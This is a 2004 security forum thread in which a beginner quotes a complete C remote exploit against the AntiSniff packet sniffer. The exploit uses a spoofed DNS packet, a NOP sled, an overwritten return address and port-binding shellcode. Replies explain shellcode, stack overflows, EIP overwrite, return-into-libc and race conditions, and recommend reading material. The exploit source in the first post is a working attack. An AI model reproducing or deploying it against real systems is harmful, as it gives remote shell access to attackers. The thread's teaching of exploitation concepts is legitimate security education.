-
August 18th, 2004, 04:58 PM
#1
how do exploits work? in a coding way..
hi all,
i was wondering how exploits work, and i don't mean, you find an vulnerability and exploit it, but more in the line of coding.
source of a random selected exploit:
Code:
/* l0phtl0phe.c - antisniff exploit (1-1-1 "second fixed version" included)
*
* -scut/teso
*
* gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
*
* description:
* l0pht messed up the fix for their problem in antisniff by not regarding
* the type signedness properties of the char and int values used. this
* results in a cool method bypassing the too extra checks (length + strncat).
* some work on this topic have been done by mixter, (bad results on type
* casting), but it should be obvious to any security conscious programmers.
* i'm not stating that they aren't allowed errors, but they should fix it
* for sure if they're going to fix it at all. -sc.
*
* 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim.
*
* greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <libnet.h>
#define OFFSET 0xbffef9a0
unsigned int build_xp (unsigned char *xp);
int
main (int argc, char *argv[])
{
int sock; /* raw socket */
u_long src_ip,
dst_ip;
unsigned char xpbuf[1024]; /* this one gets complicated now */
unsigned char tpack[2048]; /* paket buffer */
unsigned int pl_len;
if (argc != 3) {
printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]);
exit (EXIT_FAILURE);
}
sock = libnet_open_raw_sock (IPPROTO_RAW);
if (sock == -1) {
perror ("libnet_open_raw_sock");
exit (EXIT_FAILURE);
}
src_ip = libnet_name_resolve (argv[1], 0);
dst_ip = libnet_name_resolve (argv[2], 0);
pl_len = build_xp (xpbuf);
libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
src_ip, dst_ip, NULL, 0, tpack);
libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,
tpack + IP_H);
libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,
xpbuf, pl_len, tpack + IP_H + UDP_H);
libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);
/* they use "udp and dst port 53" as bpf, so we should have no problem
*/
libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);
libnet_close_raw_sock (sock);
printf ("exploitation succeeded.\n");
printf ("try: \"telnet %s 17664\" now.\n", argv[2]);
exit (EXIT_SUCCESS);
}
/* build_xp
*
* build exploit buffer into buffer pointed to by `xp'.
*/
unsigned int
build_xp (unsigned char *xp)
{
int i;
unsigned char buf[1024];
unsigned char shellcode[] =
/* portshell 17644 portshellcode by smiler & scut */
"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned char head[] =
"\x07-7350-\x00\xfe";
memcpy (buf, head, 9);
for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i)
buf[i] = '\x90';
memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode,
strlen (shellcode));
buf[272] = '\xeb';
buf[273] = '\x08';
buf[274] = (OFFSET ) & 0xff;
buf[275] = (OFFSET >> 8) & 0xff;
buf[276] = (OFFSET >> 16) & 0xff;
buf[277] = (OFFSET >> 24) & 0xff;
memcpy (xp, buf, sizeof (buf));
return (sizeof (buf));;
}
now this is written in C, and most of the stuff i understand, but
parts like
Code:
/* portshell 17644 portshellcode by smiler & scut */
"\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0"
"\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1"
"\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe"
"\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66"
"\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16"
"\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08"
"\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0"
"\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0"
"\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe"
"\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31"
"\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c"
"\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8"
"\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
are completely unknown to me, is it code in hex, and if so, is it assembly, binary code, or C in hex, (although i doubt it will be the last).
and if so, how can you learn what the above peace of code means?
i put this is the programming section, since it has to do with coding...
thanks in advance for replying
-
August 18th, 2004, 05:22 PM
#2
The part of code which you don't understand is a shellcode. It's an assembly code modified and formatted in order to be interpreted as would be a shell. It is commonly used to inject code via a buffer overflow.
Check ShellForge if you want to practice a bit about shellcodes.
edit: You should also read the famous Aleph1 article on Phrack: Smashing The Stack For Fun And Profit
Life is boring. Play NetHack... --more--
-
August 18th, 2004, 05:43 PM
#3
Another excellent read on the subject is Exploiting Software, How to Break Code by Greg Hoglund and Gary McGraw.
You can find it on Amazon, or order it direct from the author at Rootkit
-
August 18th, 2004, 06:43 PM
#4
Basically a stack overflow works like this: suppose you have a buffer:
char buffer[128];
because of some function like strcpy() which then puts data in the buffer which doesn't check boundaries you can write past the buffer. So you put your shellcode (hex opcodes) to for example bind a shell in the buffer and fill the not-filled space with NOP's. Overwriting the buffer is necessary to modify the intruction pointer (EIP) so you can make it to point to the buffer itself so the code in it gets executed when the function returns.
Normally it's like this in memory:
Buffer - EBP - ESP - EIP (I could be wrong about the stack pointer (ESP). So you have to keep in mind that you are not only overwriting the eip.
Check the prevously mentioned articles/papers on how to do this in practice.
EDIT: you may also have heard about a non-exectable stack. This makes the classic stack overflow approach impossible. Hence on linux there's the return-into-libc technique, on windows you can return to WinExec() or something other useful. Actually this is easier to achieve (on windows at least, don't know about return-into-libc, I suppose same difficulty) than the classic approach as you don't have to use shellcode per se.
The above sentences are produced by the propaganda and indoctrination of people manipulating my mind since 1987, hence, I cannot be held responsible for this post\'s content - me
www.elhalf.com
-
August 18th, 2004, 07:03 PM
#5
theres stack overflows, format string bugs, .data field exploits. the majority of these exploits involve putting stuff in memory (be it stack or heap) that causes the program to act in a different way, usually it is possible to make the return address jump somewhere else so that it points to the shellcode that an attacker has crafted, the shell code is basically opcodes for a process, such as starting a shell. the messed up program jumps to where the shellcode is held in memory, the shell code is then executed
its called shellcode cos it was meant for opening a shell, hence shellcode...but its not limited to this and you can do other things such as create files.
i2c
-
August 18th, 2004, 09:13 PM
#6
And you also have race conditions in code where the author unknowingly put in something that relies on dependent timing conditions. Examples of this could be the temporary creation of a file containing important data (and/or being able to be exploited because of ownership/rights), control-c/z/etc for data interruption, able to pipe commands into an executed script...
We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.
-
August 18th, 2004, 10:31 PM
#7
Junior Member
Hi! There are a load of links in this thread at sfdc: http://www.security-forums.com/forum...&view=previous
They have computers, and they may have other weapons of mass destruction. (Janet Reno)
I think computer viruses should count as life. I think it says something about human nature that the only form of life we have created so far is purely destructive. We\'ve created life in our own image. (Stephen Hawking)
-
August 19th, 2004, 06:48 AM
#8
wow!, plenty of things to read for me , thanks a lot for the replies, i think i will be busy the next few days reading all that is given by you guys
thanks again!
-
August 19th, 2004, 01:07 PM
#9
KissCool already posted a link to Aleph1's article on Phrack. Look around Phrack Magazine they have lots of fun articles. Some good, some bad, some really complicated, some really easy. There's something for everybody.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
August 19th, 2004, 05:21 PM
#10
yes, i've seen the phrack magazine before, but as i looked and googled for shellcode, i found that it is easy to create code and use a tool to convert it to shellcode, but it is pretty hard to do it yourself, or even write a program that can do that.. but i will absolutely check out the magazine again , thanks.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|